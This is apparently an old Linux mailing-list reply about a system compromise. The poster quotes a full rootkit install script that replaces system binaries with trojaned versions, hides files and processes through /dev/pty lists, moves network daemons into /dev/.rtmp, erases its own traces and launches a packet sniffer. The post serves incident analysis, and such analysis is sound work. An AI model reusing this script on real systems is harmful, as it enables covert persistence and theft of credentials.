>> There were a whole shit-load of files that got changed. ls is one of them
>> that was changed. Get that put back and then go look at /tmp.
>> In there you
>> will find rk and rki. In the rk directory you will find rkinstall. It
>> contains a list of all the files that got changed.
>
>I must have lucked out. I grabbed a new copy of ls, checked, and didn't
>find rk in the tmp dir. Then I grabbed a new copy of find and ran
>
> find / -name 'rk*' -print
>
>and it didn't find anything.
>
>Maybe I lucked out?
I doubt it. That directory contained the initial files to be deposited on
your system. This is what the script looked like:
./fix /usr/bin/chfn bin/chfn
./fix /usr/bin/chsh bin/chsh
./fix /bin/login bin/login
./fix /bin/ls fileutils-3.13/src/ls
./fix /bin/du fileutils-3.13/src/du
./fix /usr/bin/passwd bin/passwd
./fix /bin/ps procps-1.01/ps
./fix /usr/bin/top procps-1.01/top
./fix /usr/sbin/in.rshd rshd/rshd
./fix /bin/netstat net-tools-1.32-alpha/netstat
./fix /sbin/ifconfig net-tools-1.32-alpha/ifconfig
./fix /usr/sbin/syslogd sysklogd-1.3/syslogd
./fix /usr/sbin/inetd inetd/inetd
./fix /usr/sbin/tcpd tcpd_7.4/tcpd
./fix /usr/bin/killall psmisc/killall
./fix /bin/killall psmisc/killall
ln -sf /bin/killall psmisc/pidof
ln -sf /usr/bin/killall psmisc/pidof
./fix /usr/bin/pidof psmisc/pidof
./fix /sbin/pidof psmisc/pidof
./fix /usr/bin/find findutils/find/find
echo ".rtmp" > /dev/ptyr
echo ".tmp" >> /dev/ptyr
echo "..." >> /dev/ptyr
echo " " >> /dev/ptyr
echo "rk" >> /dev/ptyr
echo "rks" >> /dev/ptyr
echo ".. " >> /dev/ptyr
echo "3 imap" > /dev/ptyp
echo "3 eggdrop" >> /dev/ptyp
echo "3 conf" >> /dev/ptyp
echo "3 sniff" >> /dev/ptyp
echo "unknown" > /dev/ptys
echo "unk" >> /dev/ptys
echo "unkn0wn" >> /dev/ptys
echo "crime" >> /dev/ptys
echo "1 195" > /dev/ptyq
echo "1 207" >> /dev/ptyq
echo "1 63" >> /dev/ptyq
killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null
killall -9 named nmbd snmpd ypasswd 1>/dev/null 2>/dev/null
killall -9 rpc.yppasswdd 1>/dev/null 2>/dev/null
mkdir /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/rpc.* /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/smbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/portmap /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/nmbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/named /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/snmpd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/imapd /dev/.rtmp 1>/dev/null 2>/dev/null
cat /etc/inetd.conf|grep -v imap > /etc/inetd.conf.good
mv /etc/inetd.conf.good /etc/inetd.conf
killall -HUP inetd 1>/dev/null 2>/dev/null
rm -rf bin fileutils-3.13 findutils fix inetd
rm -rf net-tools-1.32-alpha procps-1.01 psmisc rshd sysklogd-1.3
rm -rf tcpd_7.4 Makefile
if test -f ../rk.tgz; then rm -rf ../rk.tgz; fi 1>/dev/null 2>/dev/null
3>/dev/null
if test -f ../rk.tar; then rm -rf ../rk.tar; fi 1>/dev/null 2>/dev/null
3>/dev/null
if test -f ../u.tgz; then tar -zxf ../u.tgz; rm -rf ../u.tgz; fi 1>/dev/null
2>/dev/null 3>/dev/null
./linsniffer > tcp.log &
For some reason, the directory was never removed on my system.
MB
--
e-mail: [EMAIL PROTECTED]
Bart: Hey, why is it destroying other toys? Lisa: They must have
programmed it to eliminate the competition. Bart: You mean like
Microsoft? Lisa: Exactly. [The Simpsons - 12/18/99]
Visit - URL:http://www.vidiot.com/ (Your link to Star Trek and UPN)
--
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.